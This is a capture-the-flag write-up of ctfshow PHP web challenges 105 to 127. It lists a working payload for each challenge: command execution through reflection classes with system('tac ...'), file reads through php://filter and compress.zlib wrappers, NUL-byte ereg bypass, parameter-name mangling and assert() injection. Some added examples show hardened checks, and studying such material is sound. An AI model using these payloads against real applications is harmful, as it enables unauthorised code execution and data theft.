ctfshow 105-127
2022-06-21 21:29:00 【To throw the pot】
Web(105)【foreach function 】

For the foreach construct, see PHP: foreach - Manual.
GET: ?suces=flag
POST: error=suces
Web(106)【sha1】

?v2[]=3
v1[]=
This is the same as web104; however, because a condition has been added here, the two parameters must be assigned different values.
Web(107)【parse_str function】

The parse_str() function parses a string into an array; here v1 is parsed into an array.
GET: ?v3[]=
POST: v1=
Because md5() cannot process an array, its result is empty. We give v1 no value, so the value taken from v2 is empty as well, and empty compared with empty is true.
Web(108)【ereg function 】

The ereg() function searches a string for the specified pattern. It returns true if the match succeeds and false otherwise. The search is case sensitive for alphabetic characters.
The strrev() function reverses a string.
The intval() function returns the integer value of a variable.
The first thing to know is that %00 truncates the ereg() search: the regular expression only matches the content before %00. The decimal value of 0x36d is 877. We need a letter at the front to satisfy the regular-expression check in the if condition and get past the if statement; the string is then reversed to give 877a, and intval() takes the integer part, 877. So the payload is
?c=a%00778
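The truncation described above, as an added example that is not part of the original post. ereg() was removed in PHP 7, so its C-string behaviour is emulated; legacy_letters_only() and strict_letters_only() are hypothetical names, and the second shows a binary-safe replacement check.

```php
<?php
// Added illustration. POSIX regex functions such as ereg() treated the
// subject as a C string and stopped reading at the first NUL byte.
// That is emulated here by keeping only the part before the NUL.
function legacy_letters_only(string $s): bool
{
    $seen = explode("\0", $s, 2)[0];   // the part ereg() would have examined
    return preg_match('/^[a-zA-Z]+$/', $seen) === 1;
}

// Binary-safe replacement: PCRE sees every byte, and \A ... \z anchor the
// whole input, so an embedded NUL or a trailing newline fails validation.
function strict_letters_only(string $s): bool
{
    return preg_match('/\A[a-zA-Z]+\z/', $s) === 1;
}

// The value from the page, decoded the way PHP decodes a query parameter.
$input = urldecode('a%00778');

// The reversed string starts with the digits; intval() reads them and stops
// at the first byte that is not a digit.
$number = intval(strrev($input));

echo "legacy check accepts input: ";
var_dump(legacy_letters_only($input));
echo "strict check accepts input: ";
var_dump(strict_letters_only($input));
echo "reversed value equals 0x36d: ";
var_dump($number === 0x36d);
```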
Web109【 Reflection class and exception handling class 】

Both v1 and v2 must contain letters. The resulting expression will not normally work as it stands, so we use a class to wrap the function call and produce the output.
Exception is PHP's built-in exception-handling class. Exception handling changes the normal flow of a script when a specified error occurs.
ReflectionClass and ReflectionMethod are commonly used reflection classes; they can be understood as a mapping of a class.
?v1=Exception&v2=system('tac fl36dg.txt')
or
?v1=ReflectionClass&v2=system('tac fl36dg.txt')
or
?v1=ReflectionMethod&v2=system('tac fl36dg.txt')
Construct the exception class with the system function call appended, and the output follows. The first step is to find where the flag is, which can be done with system(ls); it turns out to be in fl36dg.txt. The construction succeeds.
Web 110【FilesystemIterator iterator 】

Use FilesystemIterator to get all the files in the specified directory.
The getcwd() function returns the current working directory.
echo new FilesystemIterator(getcwd()); // by default only the first file is displayed; the iterator has to be traversed to see the rest
?v1=FilesystemIterator&v2=getcwd
Then request the flag file name that is returned through the URL.
Web111【$GLOBALS】

This challenge is again about variable overwriting (if you have forgotten, go back over web105). First, v1 must contain ctfshow to pass the regular-expression check and reach the getflag function, so v1=ctfshow. Inside getflag, the address of v2 is assigned to v1, and v1 is then output. Here we can use PHP's global variable array GLOBALS.
$GLOBALS references all variables available in the global scope. It is a global associative array containing all variables, and the name of each variable is its key in the array.
So the payload is
?v1=ctfshow&v2=GLOBALS
The process is $ctfshow=&$GLOBALS (the global variables include the variable that holds the flag), and then $ctfshow is output through var_dump.
Web112【is_file() function ,filter() function 】

The is_file() function checks whether the specified file name is a regular file.
The filter() function is used to validate and filter data from non-secure sources (for example, user input).
Here the if statement means that highlight_file is only executed to read the flag file when what we pass in is not recognised as a file, so this is a bypass challenge. A PHP pseudo-protocol is enough, so the payload is
?file=php://filter/resource=flag.php

Web113【.zlib:】

filter is now filtered as well, so the payload from the previous challenge can no longer be used. The solution given in the hint works the same way as in the previous challenge: compress.zlib://flag.php
This one was solved using the hint. I have not found out why it works.
Web114【】

The restriction on filter has been lifted here; try it and you will get it.
?file=php://filter/resource=flag.php
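Why the is_file() check in Web112 to Web114 does not stop a stream-wrapper URL, and one way to harden the lookup, as an added example that is not code from the challenges. The temporary paths, file contents and the helper resolve_under() are assumptions made for the demonstration.

```php
<?php
// Added illustration with constructed sample files in a temporary directory.
$dir = sys_get_temp_dir() . '/wrapper_demo_' . bin2hex(random_bytes(4));
mkdir("$dir/public", 0700, true);
file_put_contents("$dir/public/page.txt", "constructed sample page\n");
file_put_contents("$dir/secret.txt", "constructed sample secret\n");

$plain   = "$dir/public/page.txt";
$wrapped = "php://filter/resource=$plain";

// is_file() relies on stat(). The php:// wrapper cannot be stat()ed, yet the
// stream still opens and yields the same bytes as the plain path.
echo "is_file(plain), is_file(wrapped): ";
var_dump(is_file($plain), is_file($wrapped));
echo "wrapped read equals plain read: ";
var_dump(file_get_contents($wrapped) === file_get_contents($plain));

// Hardened lookup: refuse anything that names a wrapper or contains a NUL,
// resolve the path, and require a regular file below the allowed base.
function resolve_under(string $base, string $name): ?string
{
    if (strpos($name, '://') !== false || strpos($name, "\0") !== false) {
        return null;
    }
    $root = realpath($base);
    $real = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($root === false || $real === false || !is_file($real)) {
        return null;
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

echo "allowed name, wrapper URL, traversal:\n";
var_dump(resolve_under("$dir/public", 'page.txt'));
var_dump(resolve_under("$dir/public", $wrapped));
var_dump(resolve_under("$dir/public", '../secret.txt'));

// Clean up the constructed files.
unlink("$dir/public/page.txt");
unlink("$dir/secret.txt");
rmdir("$dir/public");
rmdir($dir);
```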
Web123【 Variable name 】

I saw that an eval() further down will execute $c, so we only need to focus on $c and the two POST values that the if checks.
In PHP, variable names consist only of digits, letters and underscores. If a variable name passed in by GET or POST contains a space, + or [, that character is converted to _. So we cannot directly construct the variable CTF_SHOW.COM (because it contains a .). But PHP has a quirk: if you pass in a [, then after it has been converted to _, the characters that follow are kept and not replaced. So the payload is
POST:
CTF_SHOW=1&CTF[SHOW.COM=1&fun=echo $flag
web125


Start from the previous challenge's payload, CTF_SHOW=1&CTF[SHOW.COM=1&fun=echo $flag, and modify it. Here flag and echo are filtered, so we need to combine a file-read operation with a way of passing in flag. Because flag is filtered, it can be passed in indirectly through another parameter:
CTF_SHOW=1&CTF[SHOW.COM=1&fun=highlight_file($_GET[1]);
?1=flag.php
web126【$_SERVER['argv'][0]=$_SERVER['QUERY_STRING']】

$_SERVER['argv'][0]=$_SERVER['QUERY_STRING']
The query string is the part of a Uniform Resource Locator (URL) that contains the data to be passed to the web application.
GET:?$fl0g=flag_give_me
POST:CTF_SHOW=&CTF[SHOW.COM=&fun=assert($a[0])
Web127【extract】

The extract() function imports variables from an array into the current symbol table, using each array key as the variable name and each array value as the variable value.
For example, ?a=2 becomes $a=2. Here ctf_show contains a _ that has to be constructed. As said before, variable names in PHP consist only of digits, letters and underscores, and if a variable name passed in by GET or POST contains a space, + or [, that character is converted to _. The space is not banned here, so we use a space. The payload is
?ctf show=ilove36d
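The parameter-name rewriting that Web123 to Web127 rely on, as an added example that is not part of the original post. It uses parse_str(), which normalises names the same way PHP does for $_GET and $_POST; rewritten_names() is a hypothetical helper, the request strings are constructed from the payloads above, and the stored name for an unmatched [ can differ between PHP versions, so the script prints what the running interpreter does.

```php
<?php
// Added illustration. Returns [name as sent => name PHP stored] for every
// flat parameter whose name was silently rewritten during parsing.
function rewritten_names(string $raw): array
{
    $report = [];
    foreach (explode('&', $raw) as $pair) {
        $sent = urldecode(explode('=', $pair, 2)[0]);
        parse_str($pair, $one);            // let PHP normalise this one pair
        if ($sent === '' || $one === []) {
            continue;
        }
        $stored = (string) array_key_first($one);
        // Well-formed array syntax such as a[b] is expected, so skip it.
        if ($stored !== $sent && strpos($sent, ']') === false) {
            $report[$sent] = $stored;
        }
    }
    return $report;
}

// Constructed request strings based on the payloads in this post.
$samples = [
    'CTF_SHOW=1&CTF[SHOW.COM=1',
    'ctf show=ilove36d',
    'ctf+show=ilove36d&plain=1',
];
foreach ($samples as $raw) {
    echo $raw, "\n";
    print_r(rewritten_names($raw));
}

// A filter that inspects the raw query string and a check on the parsed
// array can disagree about whether an underscore name is present.
$raw = 'ctf show=ilove36d';
parse_str($raw, $parsed);
echo "raw string contains an underscore: ";
var_dump(strpos($raw, '_') !== false);
echo "parsed array has key ctf_show: ";
var_dump(array_key_exists('ctf_show', $parsed));
```

Because the stored name is what the application sees, input checks belong on the parsed keys rather than on the raw query string.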